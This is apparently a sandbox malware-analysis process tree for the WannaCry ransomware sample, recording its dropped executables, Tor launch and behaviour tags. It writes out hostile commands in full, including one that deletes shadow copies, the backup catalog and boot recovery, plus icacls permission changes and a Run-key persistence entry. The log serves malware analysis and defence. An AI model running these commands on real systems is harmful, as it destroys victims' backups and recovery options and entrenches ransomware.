                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\Endermanch@WannaCrypt0r.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\Endermanch@WannaCrypt0r.exe"
                                                                                                  1⤵
                                                                                                  • Drops startup file
                                                                                                  • Sets desktop wallpaper using registry
                                                                                                  PID:3332
                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                    attrib +h .
                                                                                                    2⤵
                                                                                                    • Views/modifies file attributes
                                                                                                    PID:5772
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                                    2⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:3592
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                    taskdl.exe
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2096
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c 128701664477193.bat
                                                                                                    2⤵
                                                                                                      PID:5172
                                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                                        cscript.exe //nologo m.vbs
                                                                                                        3⤵
                                                                                                          PID:2976
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                        @WanaDecryptor@.exe co
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:2300
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe
                                                                                                          TaskData\Tor\taskhsvc.exe
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:708
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                                                                        2⤵
                                                                                                          PID:5036
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                            @WanaDecryptor@.exe vs
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:2276
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                                              4⤵
                                                                                                                PID:2476
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  wmic shadowcopy delete
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1672
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                            taskdl.exe
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2080
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:3572
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                            @WanaDecryptor@.exe
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Sets desktop wallpaper using registry
                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:4072
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "swneyqrjnjqirt647" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f
                                                                                                            2⤵
                                                                                                              PID:2220
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "swneyqrjnjqirt647" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f
                                                                                                                3⤵
                                                                                                                • Adds Run key to start application
                                                                                                                • Modifies registry key
                                                                                                                PID:5780
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5888
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5144
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5556
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2416
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2664
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:4500
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5892
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1932
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3140
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:2224
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2196
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3708
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4792
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1028
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4564
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:880
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:1828
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3896
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:348
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5988
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2580
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5252
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5800
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4424
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2252
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4936
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1096
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3372
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3660
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4788
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3416
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:1880
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4800
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4980
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:6120
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:800
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4184
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5944
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5988
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4672
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:2708
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4632
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:404
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3416
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1660
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4156
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5668
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4092
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1264
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:3896
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4104
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:772
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                              @WanaDecryptor@.exe
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5892
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              2⤵
                                                                                                                PID:5460
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                2⤵
                                                                                                                  PID:5984
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                  @WanaDecryptor@.exe
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:1028
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                  taskdl.exe
                                                                                                                  2⤵
                                                                                                                    PID:4980
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                    2⤵
                                                                                                                      PID:1104
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                      @WanaDecryptor@.exe
                                                                                                                      2⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5028
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                      taskdl.exe
                                                                                                                      2⤵
                                                                                                                        PID:5584
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                        2⤵
                                                                                                                          PID:5780
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                          @WanaDecryptor@.exe
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5988
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                          taskdl.exe
                                                                                                                          2⤵
                                                                                                                            PID:260
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                            2⤵
                                                                                                                              PID:4840
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                              @WanaDecryptor@.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:1424
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                              taskdl.exe
                                                                                                                              2⤵
                                                                                                                                PID:620
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                2⤵
                                                                                                                                  PID:5892
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4652
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                  taskdl.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:5460
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:5124
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:4676
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                      taskdl.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:4544
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                        2⤵
                                                                                                                                          PID:1176
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3696
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                          taskdl.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:5900
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                            2⤵
                                                                                                                                              PID:3052
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                              @WanaDecryptor@.exe
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5024
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                              taskdl.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:4076
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:2816
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                  @WanaDecryptor@.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:5236
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                  taskdl.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2252
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3592
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                      @WanaDecryptor@.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:1904
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                      taskdl.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5360
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1984
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5300
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                            taskdl.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4652
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
                                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1868
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@WanaDecryptor@.exe
                                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3060
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe
                                                                                                                                                                  taskdl.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5124
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe
